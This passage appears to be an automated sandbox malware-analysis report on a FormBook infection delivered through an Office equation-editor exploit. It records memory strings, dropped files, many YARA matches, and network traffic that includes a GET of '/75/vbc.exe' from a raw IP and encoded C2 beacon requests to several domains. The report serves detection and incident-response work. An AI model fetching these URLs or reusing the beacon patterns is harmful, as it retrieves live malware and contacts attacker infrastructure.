Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.1022782803.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.1011703149.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000245149.0000000008611000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 00000007.00000000.1022834782.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77AC4BD4.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.arjimni.com

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_036D04FF

Source: global traffic	HTTP traffic detected: GET /75/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.31Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1Host: www.arjimni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1Host: www.contractornurd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1Host: www.tw-life.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1Host: www.yiwanggkm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

4_2_0040580F

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
